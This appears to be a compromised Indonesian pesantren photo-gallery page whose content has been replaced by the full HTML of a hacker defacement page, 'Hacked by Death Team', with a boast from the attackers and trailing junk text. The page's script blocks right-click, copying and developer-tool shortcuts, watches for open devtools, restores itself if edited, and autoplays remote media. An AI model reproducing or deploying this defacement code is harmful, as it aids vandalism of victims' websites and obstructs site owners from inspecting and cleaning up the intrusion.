Koleksi foto-foto kegiatan,kehidupan sehari-hari di Pondok Pesantren manbaul Huda
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Hacked by Death Team</title> <style> body { margin: 0; background: #000; color: #fff; font-family: Arial, sans-serif; text-align: center; user-select: none; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; min-height: 100vh; display: flex; justify-content: center; align-items: center; } .container { display: flex; flex-direction: column; justify-content: center; align-items: center; min-height: 100vh; padding: 20px; pointer-events: auto; width: 100%; max-width: 700px; margin: 0 auto; } h1 { font-size: 28px; margin-bottom: 6px; font-weight: bold; color: #fff; } h2 { font-size: 16px; margin-top: 0; margin-bottom: 20px; font-weight: normal; color: #fff; } img { width: 220px; max-width: 80%; margin-bottom: 20px; pointer-events: none; } .message { font-size: 14px; color: #fff; max-width: 600px; margin: 20px auto; padding: 10px; font-style: italic; border-top: 1px solid #333; border-bottom: 1px solid #333; line-height: 1.6; } .message strong { display: block; margin-top: 8px; font-style: normal; font-weight: normal; color: #ccc; } .footer-text { font-size: 12px; color: #ccc; margin-top: 15px; } audio { width: 250px; margin-top: 10px; margin-bottom: 5px; background: #111; border-radius: 30px; } /* RESPONSIVE */ @media (max-width: 480px) { h1 { font-size: 22px; } h2 { font-size: 14px; } .message { font-size: 12px; padding: 8px 12px; } img { width: 160px; } audio { width: 200px; } } @media (min-width: 768px) { h1 { font-size: 36px; } h2 { font-size: 18px; } .message { font-size: 15px; } } </style> </head> <body> <div class="container"> <!-- JUDUL --> <h1>HACKED BY DEATH TEAM</h1> <h2>Mr Malz Has Here!!!</h2> <!-- GAMBAR --> <img alt="Death Team" src="https://b.top4top.io/p_3581qwkh40.png" onerror="this.style.display='none'" > <!-- AUDIO --> <audio controls autoplay> <source src="https://j.top4top.io/m_3581g0mrj0.mp3" type="audio/mpeg"> Browser anda tidak mendukung audio tag. </audio> <!-- PESAN --> <div class="message"> "I did not do this without reason. I did this because your website's vulnerability is very low. I also want to leave a trace so that you do not make the same mistake in the future." <strong>from Malaysia</strong> </div> <!-- FOOTER --> <p class="footer-text">Phantom Blackhat — Monarchy Sec Team Novra Sec Team</p> </div> <!-- JAVASCRIPT --> <script> (function() { 'use strict'; const originalContent = document.body.innerHTML; // DISABLE RIGHT CLICK document.oncontextmenu = function() { return false; }; // DISABLE KEYBOARD SHORTCUTS document.onkeydown = function(e) { if (e.key === 'F12') return false; if (e.ctrlKey && e.shiftKey && (e.key === 'I' || e.key === 'J' || e.key === 'C')) return false; if (e.ctrlKey && e.key === 'u') return false; if (e.ctrlKey && e.key === 's') { e.preventDefault(); return false; } if (e.ctrlKey && e.shiftKey && e.key === 'U') return false; }; // DETECT DEVTOOLS let devtoolsOpen = false; function checkDevTools() { const widthDiff = window.outerWidth - window.innerWidth; const heightDiff = window.outerHeight - window.innerHeight; if (widthDiff > 100 || heightDiff > 100) { if (!devtoolsOpen) { devtoolsOpen = true; const warning = document.createElement('div'); warning.style.cssText = 'position:fixed;top:10px;right:10px;background:#222;color:#ff0000;padding:6px 12px;font-size:11px;z-index:9999;border:1px solid #ff0000;font-weight:bold;'; warning.textContent = '⚠ DEVTOOLS DETECTED'; document.body.appendChild(warning); } } else { devtoolsOpen = false; } } setInterval(checkDevTools, 2000); // PROTECT DOM let lastHTML = document.body.innerHTML; function protectDOM() { if (document.body.innerHTML.length < lastHTML.length * 0.5) { document.body.innerHTML = originalContent; } lastHTML = document.body.innerHTML; } setInterval(protectDOM, 3000); // DISABLE DRAG & DROP document.ondragstart = function() { return false; }; document.ondrop = function() { return false; }; // DISABLE SELECT document.onselectstart = function() { return false; }; // DISABLE COPY document.oncopy = function(e) { e.preventDefault(); return false; }; // CONSOLE WARNING console.log('%c⚠️ WARNING ⚠️', 'color: red; font-size: 30px; font-weight: bold;'); console.log('%cThis page is protected by Death Team', 'color: yellow; font-size: 16px;'); console.log('%cAny modification attempts are logged', 'color: white; font-size: 14px;'); // ALERT ON LOAD window.onload = function() { alert('Hacked by Malz'); }; })(); </script> </body> </html>
sdfsdf